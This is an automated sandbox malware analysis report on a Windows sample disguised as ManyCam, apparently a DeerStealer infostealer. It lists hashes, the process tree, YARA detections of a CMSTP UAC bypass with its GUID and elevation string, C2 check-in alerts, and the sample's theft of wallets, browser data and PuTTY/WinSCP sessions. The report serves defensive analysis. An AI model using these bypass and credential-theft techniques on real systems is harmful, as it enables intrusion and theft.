Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1537836
MD5:	b55b503a690229f094ec6c9017145104
SHA1:	1e0ffefdcff18410c5221c96ed17cc42d9d37f85
SHA256:	a7cd1ac259dab063ac93ed0e9dc533bd90d1a2a26d8d0fbec0823bb073747b01
Tags:	exeuser-Bitsight
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Contain functionality to detect virtual machines

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

File is packed with WinRar

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 4020 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B55B503A690229F094EC6C9017145104)

ManyCam.exe (PID: 5480 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe" MD5: BA699791249C311883BAA8CE3432703B)

pcaui.exe (PID: 332 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)

ManyCam.exe (PID: 5856 cmdline: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe MD5: BA699791249C311883BAA8CE3432703B)

pcaui.exe (PID: 3332 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)

cmd.exe (PID: 6216 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Rzu_channel_debug.exe (PID: 7224 cmdline: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe MD5: 967F4470627F823F4D7981E511C9824F)

ManyCam.exe (PID: 7296 cmdline: "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: BA699791249C311883BAA8CE3432703B)

pcaui.exe (PID: 7304 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)

cmd.exe (PID: 7328 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ManyCam.exe (PID: 7548 cmdline: "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: BA699791249C311883BAA8CE3432703B)

pcaui.exe (PID: 7556 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)

cmd.exe (PID: 7592 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Rzu_channel_debug.exe (PID: 7776 cmdline: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe MD5: 967F4470627F823F4D7981E511C9824F)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000015.00000002.2464509110.0000000005666000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.2154639347.00000000046B5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000002.1717306561.0000000004BA9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.1772936818.00000000046CB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000013.00000002.2257486002.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000017.00000002.2656492685.0000000002701000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.2200232630.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.2199897817.0000000002B20000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 6216	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Rzu_channel_debug.exe PID: 7224	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.cmd.exe.2b207f8.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.2b207f8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x10f28:$s2: Elevation:Administrator!new:
14.2.cmd.exe.29f4a08.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.29f4a08.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x139f50:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x139f18:$s2: Elevation:Administrator!new:
23.2.Rzu_channel_debug.exe.2707a20.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.Rzu_channel_debug.exe.2707a20.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a4325:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43b0:$s1: CoGetObject 0x2a4309:$s2: Elevation:Administrator!new:
5.2.cmd.exe.5629a00.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.cmd.exe.5629a00.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a4325:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43b0:$s1: CoGetObject 0x2a4309:$s2: Elevation:Administrator!new:
23.2.Rzu_channel_debug.exe.274d6ed.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.Rzu_channel_debug.exe.274d6ed.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e658:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e6e3:$s1: CoGetObject 0x25e63c:$s2: Elevation:Administrator!new:
21.2.cmd.exe.56b1acd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.56b1acd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f258:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f2e3:$s1: CoGetObject 0x25f23c:$s2: Elevation:Administrator!new:
21.2.cmd.exe.566ca00.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.566ca00.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a4325:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43b0:$s1: CoGetObject 0x2a4309:$s2: Elevation:Administrator!new:
14.2.cmd.exe.4b11acd.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.4b11acd.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f258:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f2e3:$s1: CoGetObject 0x25f23c:$s2: Elevation:Administrator!new:
5.2.cmd.exe.566eacd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.cmd.exe.566eacd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f258:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f2e3:$s1: CoGetObject 0x25f23c:$s2: Elevation:Administrator!new:
11.2.Rzu_channel_debug.exe.2640a20.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.Rzu_channel_debug.exe.2640a20.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a4325:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43b0:$s1: CoGetObject 0x2a4309:$s2: Elevation:Administrator!new:
11.2.Rzu_channel_debug.exe.26866ed.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.Rzu_channel_debug.exe.26866ed.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e658:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e6e3:$s1: CoGetObject 0x25e63c:$s2: Elevation:Administrator!new:
11.2.Rzu_channel_debug.exe.2685aed.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.Rzu_channel_debug.exe.2685aed.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f258:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f2e3:$s1: CoGetObject 0x25f23c:$s2: Elevation:Administrator!new:
5.2.cmd.exe.566f6cd.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.cmd.exe.566f6cd.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e658:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e6e3:$s1: CoGetObject 0x25e63c:$s2: Elevation:Administrator!new:
23.2.Rzu_channel_debug.exe.274caed.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.Rzu_channel_debug.exe.274caed.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f258:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f2e3:$s1: CoGetObject 0x25f23c:$s2: Elevation:Administrator!new:
14.2.cmd.exe.4acca00.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.4acca00.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a4325:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43b0:$s1: CoGetObject 0x2a4309:$s2: Elevation:Administrator!new:
21.2.cmd.exe.56b26cd.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.56b26cd.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e658:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e6e3:$s1: CoGetObject 0x25e63c:$s2: Elevation:Administrator!new:
14.2.cmd.exe.4b126cd.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.4b126cd.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e658:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e6e3:$s1: CoGetObject 0x25e63c:$s2: Elevation:Administrator!new:
Click to see the 29 entries

Suricata Signatures

ET MALWARE Win32/DeerStealer CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-19T19:53:58.549994+0200	2056550	1	A Network Trojan was detected	192.168.2.4	49741	188.114.97.3	443	TCP
2024-10-19T19:54:36.337584+0200	2056550	1	A Network Trojan was detected	192.168.2.4	49946	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 14.2.cmd.exe.2b207f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.29f4a08.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Rzu_channel_debug.exe.2707a20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.5629a00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Rzu_channel_debug.exe.274d6ed.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.56b1acd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.566ca00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.4b11acd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.566eacd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Rzu_channel_debug.exe.2640a20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Rzu_channel_debug.exe.26866ed.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Rzu_channel_debug.exe.2685aed.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.566f6cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Rzu_channel_debug.exe.274caed.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.4acca00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.56b26cd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.4b126cd.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2464509110.0000000005666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2154639347.00000000046B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1717306561.0000000004BA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1772936818.00000000046CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2257486002.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2656492685.0000000002701000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2200232630.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2199897817.0000000002B20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Rzu_channel_debug.exe PID: 7224, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49946 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: d:\branch_2.5\bin\cximagecrt.pdb0 source: ManyCam.exe, 00000001.00000002.1718656549.0000000010062000.00000002.00000001.01000000.0000000A.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773874911.0000000010062000.00000002.00000001.01000000.00000012.sdmp, ManyCam.exe, 0000000C.00000002.2155971441.0000000010062000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: d:\branch_2.5\bin\cximagecrt.pdb source: ManyCam.exe, 00000001.00000002.1718656549.0000000010062000.00000002.00000001.01000000.0000000A.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773874911.0000000010062000.00000002.00000001.01000000.00000012.sdmp, ManyCam.exe, 0000000C.00000002.2155971441.0000000010062000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8` source: ManyCam.exe, 00000001.00000003.1707239155.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmp, ManyCam.exe, 00000003.00000002.1772005883.000000000188D000.00000002.00000001.01000000.00000017.sdmp, ManyCam.exe, 0000000C.00000002.2148219294.000000000188D000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatinerp source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002D33000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdb source: ManyCam.exe, 00000001.00000003.1706798211.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716199035.00000000017E1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000003.00000002.1771805787.0000000000CC1000.00000002.00000001.01000000.00000013.sdmp, ManyCam.exe, 0000000C.00000002.2147906276.0000000001751000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: ntdll.pdb source: Rzu_channel_debug.exe, 0000000B.00000002.2376874008.00000000069CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376703286.00000000067C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375551356.00000000059CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376367009.00000000063C8000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375705747.0000000005BC9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374752885.00000000051CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375382442.00000000057CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376194096.00000000061C6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373132992.0000000003FC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374300838.0000000004BC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374606922.0000000004FCA000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374147935.00000000049CF000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373929546.00000000047C5000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377443683.0000000006FC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377053611.0000000006BC6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372608562.00000000039C7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372755524.0000000003BC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372901125.0000000003DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371525474.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373522877.00000000043CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375872473.0000000005DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375080879.00000000055C1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376033721.0000000005FC3000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377244011.0000000006DCB000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374913688.00000000053C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376537168.00000000065C4000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373315397.00000000041CD000.00000004.00000001.00020000.
Source:	Binary string: wntdll.pdbUGP source: ManyCam.exe, 00000001.00000002.1718312431.0000000005180000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1717640762.0000000004E2B000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773211813.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772167797.0000000001E0F000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773336558.0000000004EA3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2083131407.0000000005AE0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082606440.0000000005279000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2148501151.0000000001E4A000.00000004.00000020.00020000.00000000.sdmp
